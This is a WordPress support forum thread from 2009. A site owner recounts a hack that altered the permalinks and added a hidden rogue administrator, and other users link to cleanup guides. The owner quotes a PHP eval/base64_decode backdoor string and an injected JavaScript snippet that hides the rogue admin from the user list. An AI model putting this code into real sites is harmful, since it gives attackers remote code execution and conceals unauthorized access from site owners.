Title: Admin missing from posts/ page author menu
Last modified: August 19, 2016

---

# Admin missing from posts/ page author menu

 *  [glajoe](https://wordpress.org/support/users/glajoe/)
 * (@glajoe)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/)
 * Hello,
    I am relatively new to WP, installing what was most current version in
   late March and updated during summer to 2.8.1 or 2.8.2 . Late last week I logged
   into the admin panel to enter a new post and I noticed this string of characters
   appearing in the permalinks. /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}
   |.+)&%/
 * Thankfully I didn’t post and contacted my host. While waiting for a reply I discovered
   a new administrator had appeared. When I tried to click on the new admin, the
   entire entry disappeared. So I logged into my control panel and deleted this 
   user from the database. I also noticed another user in the database who had a“
   user activation key” like I do and deleted that user.
 * Then I checked the permalinks settings and discovered the option had been changed
   to a custom setting that included the above string of malicious code. I deleted
   the code string and reset the permalinks to my original choice.
 * My host replied that things had been checked from their server side and all looked
   well, and then pointed me to an article on a site, indicating this incident was
   likely related to the recently discovered WP security issue.
 * Yes, lesson learned about using the most recent WP version because I upgraded
   either before deleting the unknown admin/user or afterwards.
 * Everything did indeed seem fine when I made 2 new posts. Then I realized the 
   posts were attributed to another user with admin status that I did add. I checked
   the “post author” drop down menu and my name does not appear in it. Neither does
   my name appear in the “page author” drop down menu though I swore it did yesterday
   and this morning. I suppose if it did then and not now that my site is still 
   open to the hacker.
 * Your help on how to fix this as well as general advice will be welcomed by this
   newbie.
 * Thank you!

Viewing 7 replies - 1 through 7 (of 7 total)

 *  Thread Starter [glajoe](https://wordpress.org/support/users/glajoe/)
 * (@glajoe)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1206912)
 * Also, I am using standard Kubrick theme, and only several plugins (Amazon widget
   short codes, Share This, Project Wonderful, and Webcomic that I could never get
   to work correctly).
 *  [tomontoast](https://wordpress.org/support/users/tomontoast/)
 * (@tomontoast)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1206913)
 * Many people have experienced this, see [http://wordpress.org/support/topic/307660?replies=1](http://wordpress.org/support/topic/307660?replies=1)
 *  Thread Starter [glajoe](https://wordpress.org/support/users/glajoe/)
 * (@glajoe)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1206922)
 * Thanks, Tom. I’ve read this a couple times before posting and couldn’t find any
   info on how to fix this issue unless the only solution is to upload a completely
   fresh copy of WP after making copies, etc.
 * Do you know if that’s the only solution?
 *  [MichaelH](https://wordpress.org/support/users/michaelh/)
 * (@michaelh)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1206954)
 * [Why isn’t the admin user listed as an author when editing posts?](http://codex.wordpress.org/FAQ_Troubleshooting#Why_isn.27t_the_admin_user_listed_as_an_author_when_editing_posts.3F )
 *  [tomontoast](https://wordpress.org/support/users/tomontoast/)
 * (@tomontoast)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1206977)
 * See [http://www.andysowards.com/blog/wordpress/breaking-wordpress-mysql-injection-how-to-fix-latest-attack-evalbase64_decode_serverhttp_referer/](http://www.andysowards.com/blog/wordpress/breaking-wordpress-mysql-injection-how-to-fix-latest-attack-evalbase64_decode_serverhttp_referer/)
 *  Thread Starter [glajoe](https://wordpress.org/support/users/glajoe/)
 * (@glajoe)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1207263)
 * Hello, Michael,
    Thanks for pointing me to that information. Ironically, before
   your post I had done part of the steps but not logged in as the new user with
   admin status. What seemed odd was the new user wasn’t showing up as an author
   either so I was hesitant to try the second part of those instructions.
 * What I did find looking through my WP database late last night in the wp_usermeta
   was another user whse first name was listed as “…” with something like this <
   div id=”user_ visible after it.
 * Then I browsed through something (I’m almost a total newb here) and found this
   code
 * <div id=”user_superuser”><script language=”JavaScript”>
    var setUserName = function(){
   try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){
   t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“
   H3”); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[
   i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(
   h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=
   document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”
   subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]
   >0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator(“
   +(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName);
   </script></div>
 * I contacted my host who forwarded this info to their WP programmer who said to
   upgrade my plugins (I did this morning though one failed) and directed me to 
   read the info here
    [http://dougal.gunters.org/blog/2009/09/05/checking-your-wordpress-security](http://dougal.gunters.org/blog/2009/09/05/checking-your-wordpress-security)
 * which confirmed my suspicion. After deleting what I think is everything attributed
   to that user, I found another user listed further on. It was the same name that
   appeared a few days back as another administrator, but the entry would disappear
   when hovering my mouse over it. At the time I deleted that person from wp_users
   thinking it was fixed.
 * After deleting “Clifford Leclaire” this second time, the new user/ admin that
   I added does now appear as an author. However, I still don’t under the original
   admin.
 * There are two rows in the wp_usermeta that read like this and do not seem to 
   be affixed to either of my two admin IDs or the person I did add. Do you have
   any advice about what to with them? Leave as is or delete them?
 * 207 38 admin_color fresh
    208 38 wp_capabilities a:1:{s:13:”administrator”;b:
   1;}
 * I hope I’ve worded things to make sense. Thanks!
 *  Thread Starter [glajoe](https://wordpress.org/support/users/glajoe/)
 * (@glajoe)
 * [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1207264)
 * Hi, Tom,
    Thank you for the link to that information. I followed it late last
   night and I think it helped me to discover the culprit. I’m tentatively exhaling
   for the moment.
 * Joe

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘Admin missing from posts/ page author menu’ is closed to new replies.

## Tags

 * [admin](https://wordpress.org/support/topic-tag/admin/)
 * [author](https://wordpress.org/support/topic-tag/author/)
 * [dropdown menu](https://wordpress.org/support/topic-tag/dropdown-menu/)
 * [page](https://wordpress.org/support/topic-tag/page/)
 * [post](https://wordpress.org/support/topic-tag/post/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 7 replies
 * 3 participants
 * Last reply from: [glajoe](https://wordpress.org/support/users/glajoe/)
 * Last activity: [16 years, 9 months ago](https://wordpress.org/support/topic/admin-missing-from-posts-page-author-menu/#post-1207264)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics
